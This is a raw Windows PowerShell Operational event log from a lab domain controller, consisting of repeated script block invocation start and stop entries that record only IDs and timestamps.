Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477577
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477576
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477575
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477574
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477573
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477572
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477570
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477569
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477568
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477567
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477566
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477564
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477563
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477562
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477561
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477560
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477559
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477558
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477557
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477556
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477555
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477554
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477553
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477552
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477551
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477550
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477549
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477548
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477547
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477546
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477544
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477542
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477541
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477540
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477539
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477538
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477537
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477536
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477535
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477534
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477533
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477532
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477531
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477530
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477529
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477528
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477527
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477526
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477525
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477524
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477523
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477522
Keywords=None
